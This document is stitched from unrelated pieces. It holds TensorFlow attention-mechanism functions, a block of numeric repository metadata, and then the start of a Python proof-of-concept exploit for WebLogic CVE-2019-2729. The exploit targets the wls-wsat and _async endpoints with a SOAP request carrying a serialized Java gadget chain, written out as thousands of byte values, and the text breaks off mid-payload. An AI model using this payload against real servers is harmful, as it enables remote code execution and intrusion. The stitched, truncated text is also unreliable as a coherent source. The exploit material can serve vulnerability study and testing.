            tf.reshape(aligned_h_state, shape=[batch_size, -1, depth * hidden_size])
    else:
        log.info("Using without projected attention alignment")
        h_state_for_attn_alignment = projected_context
        aligned_h_state = csoftmax_attention.attention_gen_block(
            h_state_for_sketch, h_state_for_attn_alignment, key, depth)
        output = \
            tf.reshape(aligned_h_state, shape=[batch_size, -1, depth * token_size])
    return output
def bahdanau_attention(key, context, hidden_size, projected_align=False):
    """ Bahdanau et al. additive attention mechanism. Based on the paper:
    https://arxiv.org/abs/1409.0473 "Neural Machine Translation by Jointly Learning to Align and Translate"

    Args:
        key: A tensorflow tensor with dimensionality [None, None, key_size]
        context: A tensorflow tensor with dimensionality [None, None, max_num_tokens, token_size]
        hidden_size: Number of units in hidden representation
        projected_align: Whether to use a bidirectional lstm for the hidden
            representation of context. If true, a bidirectional lstm layer with
            dimensionality [hidden_size] is inserted between the input and the
            attention mechanism; if false, the raw context is used for the
            weighted sum.

    Returns:
        output: Tensor at the output with dimensionality [None, None, hidden_size]
    """
    if hidden_size % 2 != 0:
        raise ValueError("hidden size must be dividable by two")
    batch_size = tf.shape(context)[0]
    max_num_tokens, token_size = context.get_shape().as_list()[-2:]
    # Collapse batch and time dimensions: [-1, max_num_tokens, token_size]
    context_3d = tf.reshape(context, shape=[-1, max_num_tokens, token_size])
    # Key projected into the attention space: [None, None, hidden_size]
    key_proj = tf.layers.dense(key, hidden_size, kernel_initializer=xav())
    # Broadcast the key across all token positions: [-1, max_num_tokens, hidden_size]
    tiled_key = tf.tile(tf.reshape(key_proj, shape=[-1, 1, hidden_size]),
                        [1, max_num_tokens, 1])
    fw_cell = tf.nn.rnn_cell.LSTMCell(hidden_size // 2)
    bw_cell = tf.nn.rnn_cell.LSTMCell(hidden_size // 2)
    (fw_out, bw_out), states = \
        tf.nn.bidirectional_dynamic_rnn(cell_fw=fw_cell,
                                        cell_bw=bw_cell,
                                        inputs=context_3d,
                                        dtype=tf.float32)
    # bilstm_output: [-1, max_num_tokens, hidden_size]
    bilstm_output = tf.concat([fw_out, bw_out], -1)
    # Additive score: single hidden layer over [key; fw; bw], then a scalar.
    concat_state = tf.concat([tiled_key, fw_out, bw_out], -1)
    hidden_rep = tf.layers.dense(concat_state, hidden_size, use_bias=False,
                                 kernel_initializer=xav())
    score = tf.layers.dense(tf.tanh(hidden_rep), units=1, use_bias=False,
                            kernel_initializer=xav())
    attn_weights = tf.nn.softmax(score, dim=1)
    if projected_align:
        log.info("Using projected attention alignment")
        weighted = tf.matmul(tf.transpose(bilstm_output, [0, 2, 1]), attn_weights)
        output = tf.reshape(weighted, shape=[batch_size, -1, hidden_size])
    else:
        log.info("Using without projected attention alignment")
        weighted = tf.matmul(tf.transpose(context_3d, [0, 2, 1]), attn_weights)
        output = tf.reshape(weighted, shape=[batch_size, -1, token_size])
    return output
def light_bahdanau_attention(key, context, hidden_size, projected_align=False):
    """ Bahdanau et al. additive attention mechanism (lightweight variant).
    Based on the paper:
    https://arxiv.org/abs/1409.0473 "Neural Machine Translation by Jointly Learning to Align and Translate"

    Args:
        key: A tensorflow tensor with dimensionality [None, None, key_size]
        context: A tensorflow tensor with dimensionality [None, None, max_num_tokens, token_size]
        hidden_size: Number of units in hidden representation
        projected_align: Whether to use a dense layer for the hidden representation
            of context. If true, a dense layer with dimensionality [hidden_size] is
            inserted between the input and the attention mechanism; if false, the
            raw context is used for the weighted sum.

    Returns:
        output: Tensor at the output with dimensionality [None, None, hidden_size]
    """
    batch_size = tf.shape(context)[0]
    max_num_tokens, token_size = context.get_shape().as_list()[-2:]
    # Collapse batch and time dimensions: [-1, max_num_tokens, token_size]
    context_3d = tf.reshape(context, shape=[-1, max_num_tokens, token_size])
    # Key projected into the attention space: [None, None, hidden_size]
    key_proj = tf.layers.dense(key, hidden_size, kernel_initializer=xav())
    # Broadcast the key across all token positions: [-1, max_num_tokens, hidden_size]
    tiled_key = tf.tile(tf.reshape(key_proj, shape=[-1, 1, hidden_size]),
                        [1, max_num_tokens, 1])
    # Context projected into the attention space: [-1, max_num_tokens, hidden_size]
    context_proj = tf.layers.dense(context_3d, hidden_size,
                                   kernel_initializer=xav())
    # Additive score: single hidden layer over [context; key], then a scalar.
    concat_state = tf.concat([context_proj, tiled_key], -1)
    hidden_rep = tf.layers.dense(concat_state, hidden_size, use_bias=False,
                                 kernel_initializer=xav())
    score = tf.layers.dense(tf.tanh(hidden_rep), units=1, use_bias=False,
                            kernel_initializer=xav())
    attn_weights = tf.nn.softmax(score, dim=1)
    if projected_align:
        log.info("Using projected attention alignment")
        weighted = tf.matmul(tf.transpose(context_proj, [0, 2, 1]), attn_weights)
        output = tf.reshape(weighted, shape=[batch_size, -1, hidden_size])
    else:
        log.info("Using without projected attention alignment")
        weighted = tf.matmul(tf.transpose(context_3d, [0, 2, 1]), attn_weights)
        output = tf.reshape(weighted, shape=[batch_size, -1, token_size])
    return output
def cs_bahdanau_attention(key, context, hidden_size, depth, projected_align=False):
    """ Bahdanau et al. attention mechanism with constrained softmax (csoftmax).
    Based on the papers:
    https://arxiv.org/abs/1409.0473 "Neural Machine Translation by Jointly Learning to Align and Translate"
    https://andre-martins.github.io/docs/emnlp2017_final.pdf "Learning What's Easy: Fully Differentiable Neural Easy-First Taggers"

    Args:
        key: A tensorflow tensor with dimensionality [None, None, key_size]
        context: A tensorflow tensor with dimensionality [None, None, max_num_tokens, token_size]
        hidden_size: Number of units in hidden representation
        depth: Number of csoftmax usages
        projected_align: Whether to use a bidirectional lstm for the hidden
            representation of context. If true, a bidirectional lstm layer with
            dimensionality [hidden_size] is inserted between the input and the
            attention mechanism; if false, the projected context is aligned directly.

    Returns:
        output: Tensor at the output with dimensionality [None, None, depth * hidden_size]
            (or [None, None, depth * token_size] when projected_align is false)
    """
    if hidden_size % 2 != 0:
        raise ValueError("hidden size must be dividable by two")
    batch_size = tf.shape(context)[0]
    max_num_tokens, token_size = context.get_shape().as_list()[-2:]
    context_3d = tf.reshape(context, shape=[-1, max_num_tokens, token_size])
    # projected context: [None, max_num_tokens, token_size]
    projected_context = tf.layers.dense(context_3d, token_size,
                                        kernel_initializer=xav(),
                                        name='projected_context')
    # projected_key: [None, None, hidden_size]
    projected_key = tf.layers.dense(key, hidden_size, kernel_initializer=xav(),
                                    name='projected_key')
    # Broadcast the key across all token positions: [-1, max_num_tokens, hidden_size]
    tiled_key = tf.tile(tf.reshape(projected_key, shape=[-1, 1, hidden_size]),
                        [1, max_num_tokens, 1])
    fw_cell = tf.nn.rnn_cell.LSTMCell(hidden_size // 2)
    bw_cell = tf.nn.rnn_cell.LSTMCell(hidden_size // 2)
    (fw_out, bw_out), states = \
        tf.nn.bidirectional_dynamic_rnn(cell_fw=fw_cell,
                                        cell_bw=bw_cell,
                                        inputs=projected_context,
                                        dtype=tf.float32)
    # bilstm_output: [-1, max_num_tokens, hidden_size]
    bilstm_output = tf.concat([fw_out, bw_out], -1)
    concat_h_state = tf.concat([tiled_key, fw_out, bw_out], -1)
    # Both branches run the same csoftmax block; they differ only in which
    # states get aligned and in the width of the resulting output.
    if projected_align:
        log.info("Using projected attention alignment")
        attn_alignment_states = bilstm_output
        out_units = hidden_size
    else:
        log.info("Using without projected attention alignment")
        attn_alignment_states = projected_context
        out_units = token_size
    aligned_h_state = csoftmax_attention.attention_bah_block(
        concat_h_state, attn_alignment_states, depth)
    output = tf.reshape(aligned_h_state,
                        shape=[batch_size, -1, depth * out_units])
    return output
| 50.337278
| 135
| 0.672623
| 2,245
| 17,014
| 4.872606
| 0.093987
| 0.063991
| 0.030716
| 0.031081
| 0.92833
| 0.921382
| 0.913063
| 0.911692
| 0.909681
| 0.909681
| 0
| 0.013804
| 0.237863
| 17,014
| 337
| 136
| 50.486647
| 0.829799
| 0.362525
| 0
| 0.895833
| 0
| 0
| 0.062798
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03125
| false
| 0
| 0.020833
| 0
| 0.083333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c762abd7912bc0d637a406357b7467d777accccb
| 357,618
|
py
|
Python
|
poc/CVE_2019_2729.py
|
rabbitmask/Weblogic-
|
05cee3a69cf403e4db5f057c569a923c107cb97b
|
[
"MIT"
] | 1
|
2022-02-22T06:58:37.000Z
|
2022-02-22T06:58:37.000Z
|
poc/CVE_2019_2729.py
|
secfb/WeblogicScan
|
05cee3a69cf403e4db5f057c569a923c107cb97b
|
[
"MIT"
] | null | null | null |
poc/CVE_2019_2729.py
|
secfb/WeblogicScan
|
05cee3a69cf403e4db5f057c569a923c107cb97b
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# _*_ coding:utf-8 _*_
'''
____ _ _ _ _ __ __ _
| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __
| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ <
|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\
'''
import sys
import time
import requests
from config.config_requests import ua
VUL=['CVE-2019-2729']
path1 = '/wls-wsat/CoordinatorPortType'
path2 = '/_async/AsyncResponseService'
payload1 = '''
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<array method="forName"><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string><void>
<array class="byte" length="5010"><void index="0"><byte>-84</byte></void><void index="1"><byte>-19</byte></void><void index="2"><byte>0</byte></void><void index="3"><byte>5</byte></void><void index="4"><byte>115</byte></void><void index="5"><byte>114</byte></void><void index="6"><byte>0</byte></void><void index="7"><byte>23</byte></void><void index="8"><byte>106</byte></void><void index="9"><byte>97</byte></void><void index="10"><byte>118</byte></void><void index="11"><byte>97</byte></void><void index="12"><byte>46</byte></void><void index="13"><byte>117</byte></void><void index="14"><byte>116</byte></void><void index="15"><byte>105</byte></void><void index="16"><byte>108</byte></void><void index="17"><byte>46</byte></void><void index="18"><byte>76</byte></void><void index="19"><byte>105</byte></void><void index="20"><byte>110</byte></void><void index="21"><byte>107</byte></void><void index="22"><byte>101</byte></void><void index="23"><byte>100</byte></void><void index="24"><byte>72</byte></void><void index="25"><byte>97</byte></void><void index="26"><byte>115</byte></void><void index="27"><byte>104</byte></void><void index="28"><byte>83</byte></void><void index="29"><byte>101</byte></void><void index="30"><byte>116</byte></void><void index="31"><byte>-40</byte></void><void index="32"><byte>108</byte></void><void index="33"><byte>-41</byte></void><void index="34"><byte>90</byte></void><void index="35"><byte>-107</byte></void><void index="36"><byte>-35</byte></void><void index="37"><byte>42</byte></void><void index="38"><byte>30</byte></void><void index="39"><byte>2</byte></void><void index="40"><byte>0</byte></void><void index="41"><byte>0</byte></void><void index="42"><byte>120</byte></void><void index="43"><byte>114</byte></void><void index="44"><byte>0</byte></void><void index="45"><byte>17</byte></void><void index="46"><byte>106</byte></void><void index="47"><byte>97</byte></void><void index="48"><byte>118</byte></void><void 
index="49"><byte>97</byte></void><void index="50"><byte>46</byte></void><void index="51"><byte>117</byte></void><void index="52"><byte>116</byte></void><void index="53"><byte>105</byte></void><void index="54"><byte>108</byte></void><void index="55"><byte>46</byte></void><void index="56"><byte>72</byte></void><void index="57"><byte>97</byte></void><void index="58"><byte>115</byte></void><void index="59"><byte>104</byte></void><void index="60"><byte>83</byte></void><void index="61"><byte>101</byte></void><void index="62"><byte>116</byte></void><void index="63"><byte>-70</byte></void><void index="64"><byte>68</byte></void><void index="65"><byte>-123</byte></void><void index="66"><byte>-107</byte></void><void index="67"><byte>-106</byte></void><void index="68"><byte>-72</byte></void><void index="69"><byte>-73</byte></void><void index="70"><byte>52</byte></void><void index="71"><byte>3</byte></void><void index="72"><byte>0</byte></void><void index="73"><byte>0</byte></void><void index="74"><byte>120</byte></void><void index="75"><byte>112</byte></void><void index="76"><byte>119</byte></void><void index="77"><byte>12</byte></void><void index="78"><byte>0</byte></void><void index="79"><byte>0</byte></void><void index="80"><byte>0</byte></void><void index="81"><byte>16</byte></void><void index="82"><byte>63</byte></void><void index="83"><byte>64</byte></void><void index="84"><byte>0</byte></void><void index="85"><byte>0</byte></void><void index="86"><byte>0</byte></void><void index="87"><byte>0</byte></void><void index="88"><byte>0</byte></void><void index="89"><byte>2</byte></void><void index="90"><byte>115</byte></void><void index="91"><byte>114</byte></void><void index="92"><byte>0</byte></void><void index="93"><byte>58</byte></void><void index="94"><byte>99</byte></void><void index="95"><byte>111</byte></void><void index="96"><byte>109</byte></void><void index="97"><byte>46</byte></void><void index="98"><byte>115</byte></void><void 
index="99"><byte>117</byte></void><void index="100"><byte>110</byte></void><void index="101"><byte>46</byte></void><void index="102"><byte>111</byte></void><void index="103"><byte>114</byte></void><void index="104"><byte>103</byte></void><void index="105"><byte>46</byte></void><void index="106"><byte>97</byte></void><void index="107"><byte>112</byte></void><void index="108"><byte>97</byte></void><void index="109"><byte>99</byte></void><void index="110"><byte>104</byte></void><void index="111"><byte>101</byte></void><void index="112"><byte>46</byte></void><void index="113"><byte>120</byte></void><void index="114"><byte>97</byte></void><void index="115"><byte>108</byte></void><void index="116"><byte>97</byte></void><void index="117"><byte>110</byte></void><void index="118"><byte>46</byte></void><void index="119"><byte>105</byte></void><void index="120"><byte>110</byte></void><void index="121"><byte>116</byte></void><void index="122"><byte>101</byte></void><void index="123"><byte>114</byte></void><void index="124"><byte>110</byte></void><void index="125"><byte>97</byte></void><void index="126"><byte>108</byte></void><void index="127"><byte>46</byte></void><void index="128"><byte>120</byte></void><void index="129"><byte>115</byte></void><void index="130"><byte>108</byte></void><void index="131"><byte>116</byte></void><void index="132"><byte>99</byte></void><void index="133"><byte>46</byte></void><void index="134"><byte>116</byte></void><void index="135"><byte>114</byte></void><void index="136"><byte>97</byte></void><void index="137"><byte>120</byte></void><void index="138"><byte>46</byte></void><void index="139"><byte>84</byte></void><void index="140"><byte>101</byte></void><void index="141"><byte>109</byte></void><void index="142"><byte>112</byte></void><void index="143"><byte>108</byte></void><void index="144"><byte>97</byte></void><void index="145"><byte>116</byte></void><void index="146"><byte>101</byte></void><void index="147"><byte>115</byte></void><void 
index="148"><byte>73</byte></void><void index="149"><byte>109</byte></void><void index="150"><byte>112</byte></void><void index="151"><byte>108</byte></void><void index="152"><byte>9</byte></void><void index="153"><byte>87</byte></void><void index="154"><byte>79</byte></void><void index="155"><byte>-63</byte></void><void index="156"><byte>110</byte></void><void index="157"><byte>-84</byte></void><void index="158"><byte>-85</byte></void><void index="159"><byte>51</byte></void><void index="160"><byte>3</byte></void><void index="161"><byte>0</byte></void><void index="162"><byte>9</byte></void><void index="163"><byte>73</byte></void><void index="164"><byte>0</byte></void><void index="165"><byte>13</byte></void><void index="166"><byte>95</byte></void><void index="167"><byte>105</byte></void><void index="168"><byte>110</byte></void><void index="169"><byte>100</byte></void><void index="170"><byte>101</byte></void><void index="171"><byte>110</byte></void><void index="172"><byte>116</byte></void><void index="173"><byte>78</byte></void><void index="174"><byte>117</byte></void><void index="175"><byte>109</byte></void><void index="176"><byte>98</byte></void><void index="177"><byte>101</byte></void><void index="178"><byte>114</byte></void><void index="179"><byte>73</byte></void><void index="180"><byte>0</byte></void><void index="181"><byte>14</byte></void><void index="182"><byte>95</byte></void><void index="183"><byte>116</byte></void><void index="184"><byte>114</byte></void><void index="185"><byte>97</byte></void><void index="186"><byte>110</byte></void><void index="187"><byte>115</byte></void><void index="188"><byte>108</byte></void><void index="189"><byte>101</byte></void><void index="190"><byte>116</byte></void><void index="191"><byte>73</byte></void><void index="192"><byte>110</byte></void><void index="193"><byte>100</byte></void><void index="194"><byte>101</byte></void><void index="195"><byte>120</byte></void><void index="196"><byte>90</byte></void><void 
index="197"><byte>0</byte></void><void index="198"><byte>21</byte></void><void index="199"><byte>95</byte></void><void index="200"><byte>117</byte></void><void index="201"><byte>115</byte></void><void index="202"><byte>101</byte></void><void index="203"><byte>83</byte></void><void index="204"><byte>101</byte></void><void index="205"><byte>114</byte></void><void index="206"><byte>118</byte></void><void index="207"><byte>105</byte></void><void index="208"><byte>99</byte></void><void index="209"><byte>101</byte></void><void index="210"><byte>115</byte></void><void index="211"><byte>77</byte></void><void index="212"><byte>101</byte></void><void index="213"><byte>99</byte></void><void index="214"><byte>104</byte></void><void index="215"><byte>97</byte></void><void index="216"><byte>110</byte></void><void index="217"><byte>105</byte></void><void index="218"><byte>115</byte></void><void index="219"><byte>109</byte></void><void index="220"><byte>76</byte></void><void index="221"><byte>0</byte></void><void index="222"><byte>25</byte></void><void index="223"><byte>95</byte></void><void index="224"><byte>97</byte></void><void index="225"><byte>99</byte></void><void index="226"><byte>99</byte></void><void index="227"><byte>101</byte></void><void index="228"><byte>115</byte></void><void index="229"><byte>115</byte></void><void index="230"><byte>69</byte></void><void index="231"><byte>120</byte></void><void index="232"><byte>116</byte></void><void index="233"><byte>101</byte></void><void index="234"><byte>114</byte></void><void index="235"><byte>110</byte></void><void index="236"><byte>97</byte></void><void index="237"><byte>108</byte></void><void index="238"><byte>83</byte></void><void index="239"><byte>116</byte></void><void index="240"><byte>121</byte></void><void index="241"><byte>108</byte></void><void index="242"><byte>101</byte></void><void index="243"><byte>115</byte></void><void index="244"><byte>104</byte></void><void index="245"><byte>101</byte></void><void 
index="246"><byte>101</byte></void><void index="247"><byte>116</byte></void><void index="248"><byte>116</byte></void><void index="249"><byte>0</byte></void><void index="250"><byte>18</byte></void><void index="251"><byte>76</byte></void><void index="252"><byte>106</byte></void><void index="253"><byte>97</byte></void><void index="254"><byte>118</byte></void><void index="255"><byte>97</byte></void><void index="256"><byte>47</byte></void><void index="257"><byte>108</byte></void><void index="258"><byte>97</byte></void><void index="259"><byte>110</byte></void><void index="260"><byte>103</byte></void><void index="261"><byte>47</byte></void><void index="262"><byte>83</byte></void><void index="263"><byte>116</byte></void><void index="264"><byte>114</byte></void><void index="265"><byte>105</byte></void><void index="266"><byte>110</byte></void><void index="267"><byte>103</byte></void><void index="268"><byte>59</byte></void><void index="269"><byte>76</byte></void><void index="270"><byte>0</byte></void><void index="271"><byte>11</byte></void><void index="272"><byte>95</byte></void><void index="273"><byte>97</byte></void><void index="274"><byte>117</byte></void><void index="275"><byte>120</byte></void><void index="276"><byte>67</byte></void><void index="277"><byte>108</byte></void><void index="278"><byte>97</byte></void><void index="279"><byte>115</byte></void><void index="280"><byte>115</byte></void><void index="281"><byte>101</byte></void><void index="282"><byte>115</byte></void><void index="283"><byte>116</byte></void><void index="284"><byte>0</byte></void><void index="285"><byte>59</byte></void><void index="286"><byte>76</byte></void><void index="287"><byte>99</byte></void><void index="288"><byte>111</byte></void><void index="289"><byte>109</byte></void><void index="290"><byte>47</byte></void><void index="291"><byte>115</byte></void><void index="292"><byte>117</byte></void><void index="293"><byte>110</byte></void><void index="294"><byte>47</byte></void><void 
index="295"><byte>111</byte></void><void index="296"><byte>114</byte></void><void index="297"><byte>103</byte></void><void index="298"><byte>47</byte></void><void index="299"><byte>97</byte></void><void index="300"><byte>112</byte></void><void index="301"><byte>97</byte></void><void index="302"><byte>99</byte></void><void index="303"><byte>104</byte></void><void index="304"><byte>101</byte></void><void index="305"><byte>47</byte></void><void index="306"><byte>120</byte></void><void index="307"><byte>97</byte></void><void index="308"><byte>108</byte></void><void index="309"><byte>97</byte></void><void index="310"><byte>110</byte></void><void index="311"><byte>47</byte></void><void index="312"><byte>105</byte></void><void index="313"><byte>110</byte></void><void index="314"><byte>116</byte></void><void index="315"><byte>101</byte></void><void index="316"><byte>114</byte></void><void index="317"><byte>110</byte></void><void index="318"><byte>97</byte></void><void index="319"><byte>108</byte></void><void index="320"><byte>47</byte></void><void index="321"><byte>120</byte></void><void index="322"><byte>115</byte></void><void index="323"><byte>108</byte></void><void index="324"><byte>116</byte></void><void index="325"><byte>99</byte></void><void index="326"><byte>47</byte></void><void index="327"><byte>114</byte></void><void index="328"><byte>117</byte></void><void index="329"><byte>110</byte></void><void index="330"><byte>116</byte></void><void index="331"><byte>105</byte></void><void index="332"><byte>109</byte></void><void index="333"><byte>101</byte></void><void index="334"><byte>47</byte></void><void index="335"><byte>72</byte></void><void index="336"><byte>97</byte></void><void index="337"><byte>115</byte></void><void index="338"><byte>104</byte></void><void index="339"><byte>116</byte></void><void index="340"><byte>97</byte></void><void index="341"><byte>98</byte></void><void index="342"><byte>108</byte></void><void index="343"><byte>101</byte></void><void 
index="344"><byte>59</byte></void><void index="345"><byte>91</byte></void><void index="346"><byte>0</byte></void><void index="347"><byte>10</byte></void><void index="348"><byte>95</byte></void><void index="349"><byte>98</byte></void><void index="350"><byte>121</byte></void><void index="351"><byte>116</byte></void><void index="352"><byte>101</byte></void><void index="353"><byte>99</byte></void><void index="354"><byte>111</byte></void><void index="355"><byte>100</byte></void><void index="356"><byte>101</byte></void><void index="357"><byte>115</byte></void><void index="358"><byte>116</byte></void><void index="359"><byte>0</byte></void><void index="360"><byte>3</byte></void><void index="361"><byte>91</byte></void><void index="362"><byte>91</byte></void><void index="363"><byte>66</byte></void><void index="364"><byte>91</byte></void><void index="365"><byte>0</byte></void><void index="366"><byte>6</byte></void><void index="367"><byte>95</byte></void><void index="368"><byte>99</byte></void><void index="369"><byte>108</byte></void><void index="370"><byte>97</byte></void><void index="371"><byte>115</byte></void><void index="372"><byte>115</byte></void><void index="373"><byte>116</byte></void><void index="374"><byte>0</byte></void><void index="375"><byte>18</byte></void><void index="376"><byte>91</byte></void><void index="377"><byte>76</byte></void><void index="378"><byte>106</byte></void><void index="379"><byte>97</byte></void><void index="380"><byte>118</byte></void><void index="381"><byte>97</byte></void><void index="382"><byte>47</byte></void><void index="383"><byte>108</byte></void><void index="384"><byte>97</byte></void><void index="385"><byte>110</byte></void><void index="386"><byte>103</byte></void><void index="387"><byte>47</byte></void><void index="388"><byte>67</byte></void><void index="389"><byte>108</byte></void><void index="390"><byte>97</byte></void><void index="391"><byte>115</byte></void><void index="392"><byte>115</byte></void><void 
index="393"><byte>59</byte></void><void index="394"><byte>76</byte></void><void index="395"><byte>0</byte></void><void index="396"><byte>5</byte></void><void index="397"><byte>95</byte></void><void index="398"><byte>110</byte></void><void index="399"><byte>97</byte></void><void index="400"><byte>109</byte></void><void index="401"><byte>101</byte></void><void index="402"><byte>113</byte></void><void index="403"><byte>0</byte></void><void index="404"><byte>126</byte></void><void index="405"><byte>0</byte></void><void index="406"><byte>4</byte></void><void index="407"><byte>76</byte></void><void index="408"><byte>0</byte></void><void index="409"><byte>17</byte></void><void index="410"><byte>95</byte></void><void index="411"><byte>111</byte></void><void index="412"><byte>117</byte></void><void index="413"><byte>116</byte></void><void index="414"><byte>112</byte></void><void index="415"><byte>117</byte></void><void index="416"><byte>116</byte></void><void index="417"><byte>80</byte></void><void index="418"><byte>114</byte></void><void index="419"><byte>111</byte></void><void index="420"><byte>112</byte></void><void index="421"><byte>101</byte></void><void index="422"><byte>114</byte></void><void index="423"><byte>116</byte></void><void index="424"><byte>105</byte></void><void index="425"><byte>101</byte></void><void index="426"><byte>115</byte></void><void index="427"><byte>116</byte></void><void index="428"><byte>0</byte></void><void index="429"><byte>22</byte></void><void index="430"><byte>76</byte></void><void index="431"><byte>106</byte></void><void index="432"><byte>97</byte></void><void index="433"><byte>118</byte></void><void index="434"><byte>97</byte></void><void index="435"><byte>47</byte></void><void index="436"><byte>117</byte></void><void index="437"><byte>116</byte></void><void index="438"><byte>105</byte></void><void index="439"><byte>108</byte></void><void index="440"><byte>47</byte></void><void index="441"><byte>80</byte></void><void 
index="442"><byte>114</byte></void><void index="443"><byte>111</byte></void><void index="444"><byte>112</byte></void><void index="445"><byte>101</byte></void><void index="446"><byte>114</byte></void><void index="447"><byte>116</byte></void><void index="448"><byte>105</byte></void><void index="449"><byte>101</byte></void><void index="450"><byte>115</byte></void><void index="451"><byte>59</byte></void><void index="452"><byte>120</byte></void><void index="453"><byte>112</byte></void><void index="454"><byte>0</byte></void><void index="455"><byte>0</byte></void><void index="456"><byte>0</byte></void><void index="457"><byte>0</byte></void><void index="458"><byte>-1</byte></void><void index="459"><byte>-1</byte></void><void index="460"><byte>-1</byte></void><void index="461"><byte>-1</byte></void><void index="462"><byte>0</byte></void><void index="463"><byte>116</byte></void><void index="464"><byte>0</byte></void><void index="465"><byte>3</byte></void><void index="466"><byte>97</byte></void><void index="467"><byte>108</byte></void><void index="468"><byte>108</byte></void><void index="469"><byte>112</byte></void><void index="470"><byte>117</byte></void><void index="471"><byte>114</byte></void><void index="472"><byte>0</byte></void><void index="473"><byte>3</byte></void><void index="474"><byte>91</byte></void><void index="475"><byte>91</byte></void><void index="476"><byte>66</byte></void><void index="477"><byte>75</byte></void><void index="478"><byte>-3</byte></void><void index="479"><byte>25</byte></void><void index="480"><byte>21</byte></void><void index="481"><byte>103</byte></void><void index="482"><byte>103</byte></void><void index="483"><byte>-37</byte></void><void index="484"><byte>55</byte></void><void index="485"><byte>2</byte></void><void index="486"><byte>0</byte></void><void index="487"><byte>0</byte></void><void index="488"><byte>120</byte></void><void index="489"><byte>112</byte></void><void index="490"><byte>0</byte></void><void 
index="491"><byte>0</byte></void><void index="492"><byte>0</byte></void><void index="493"><byte>2</byte></void><void index="494"><byte>117</byte></void><void index="495"><byte>114</byte></void><void index="496"><byte>0</byte></void><void index="497"><byte>2</byte></void><void index="498"><byte>91</byte></void><void index="499"><byte>66</byte></void><void index="500"><byte>-84</byte></void><void index="501"><byte>-13</byte></void><void index="502"><byte>23</byte></void><void index="503"><byte>-8</byte></void><void index="504"><byte>6</byte></void><void index="505"><byte>8</byte></void><void index="506"><byte>84</byte></void><void index="507"><byte>-32</byte></void><void index="508"><byte>2</byte></void><void index="509"><byte>0</byte></void><void index="510"><byte>0</byte></void><void index="511"><byte>120</byte></void><void index="512"><byte>112</byte></void><void index="513"><byte>0</byte></void><void index="514"><byte>0</byte></void><void index="515"><byte>14</byte></void><void index="516"><byte>29</byte></void><void index="517"><byte>-54</byte></void><void index="518"><byte>-2</byte></void><void index="519"><byte>-70</byte></void><void index="520"><byte>-66</byte></void><void index="521"><byte>0</byte></void><void index="522"><byte>0</byte></void><void index="523"><byte>0</byte></void><void index="524"><byte>50</byte></void><void index="525"><byte>0</byte></void><void index="526"><byte>-70</byte></void><void index="527"><byte>10</byte></void><void index="528"><byte>0</byte></void><void index="529"><byte>3</byte></void><void index="530"><byte>0</byte></void><void index="531"><byte>34</byte></void><void index="532"><byte>7</byte></void><void index="533"><byte>0</byte></void><void index="534"><byte>-72</byte></void><void index="535"><byte>7</byte></void><void index="536"><byte>0</byte></void><void index="537"><byte>37</byte></void><void index="538"><byte>7</byte></void><void index="539"><byte>0</byte></void><void index="540"><byte>38</byte></void><void 
index="541"><byte>1</byte></void><void index="542"><byte>0</byte></void><void index="543"><byte>16</byte></void><void index="544"><byte>115</byte></void><void index="545"><byte>101</byte></void><void index="546"><byte>114</byte></void><void index="547"><byte>105</byte></void><void index="548"><byte>97</byte></void><void index="549"><byte>108</byte></void><void index="550"><byte>86</byte></void><void index="551"><byte>101</byte></void><void index="552"><byte>114</byte></void><void index="553"><byte>115</byte></void><void index="554"><byte>105</byte></void><void index="555"><byte>111</byte></void><void index="556"><byte>110</byte></void><void index="557"><byte>85</byte></void><void index="558"><byte>73</byte></void><void index="559"><byte>68</byte></void><void index="560"><byte>1</byte></void><void index="561"><byte>0</byte></void><void index="562"><byte>1</byte></void><void index="563"><byte>74</byte></void><void index="564"><byte>1</byte></void><void index="565"><byte>0</byte></void><void index="566"><byte>13</byte></void><void index="567"><byte>67</byte></void><void index="568"><byte>111</byte></void><void index="569"><byte>110</byte></void><void index="570"><byte>115</byte></void><void index="571"><byte>116</byte></void><void index="572"><byte>97</byte></void><void index="573"><byte>110</byte></void><void index="574"><byte>116</byte></void><void index="575"><byte>86</byte></void><void index="576"><byte>97</byte></void><void index="577"><byte>108</byte></void><void index="578"><byte>117</byte></void><void index="579"><byte>101</byte></void><void index="580"><byte>5</byte></void><void index="581"><byte>-83</byte></void><void index="582"><byte>32</byte></void><void index="583"><byte>-109</byte></void><void index="584"><byte>-13</byte></void><void index="585"><byte>-111</byte></void><void index="586"><byte>-35</byte></void><void index="587"><byte>-17</byte></void><void index="588"><byte>62</byte></void><void index="589"><byte>1</byte></void><void 
index="590"><byte>0</byte></void><void index="591"><byte>6</byte></void><void index="592"><byte>60</byte></void><void index="593"><byte>105</byte></void><void index="594"><byte>110</byte></void><void index="595"><byte>105</byte></void><void index="596"><byte>116</byte></void><void index="597"><byte>62</byte></void><void index="598"><byte>1</byte></void><void index="599"><byte>0</byte></void><void index="600"><byte>3</byte></void><void index="601"><byte>40</byte></void><void index="602"><byte>41</byte></void><void index="603"><byte>86</byte></void><void index="604"><byte>1</byte></void><void index="605"><byte>0</byte></void><void index="606"><byte>4</byte></void><void index="607"><byte>67</byte></void><void index="608"><byte>111</byte></void><void index="609"><byte>100</byte></void><void index="610"><byte>101</byte></void><void index="611"><byte>1</byte></void><void index="612"><byte>0</byte></void><void index="613"><byte>15</byte></void><void index="614"><byte>76</byte></void><void index="615"><byte>105</byte></void><void index="616"><byte>110</byte></void><void index="617"><byte>101</byte></void><void index="618"><byte>78</byte></void><void 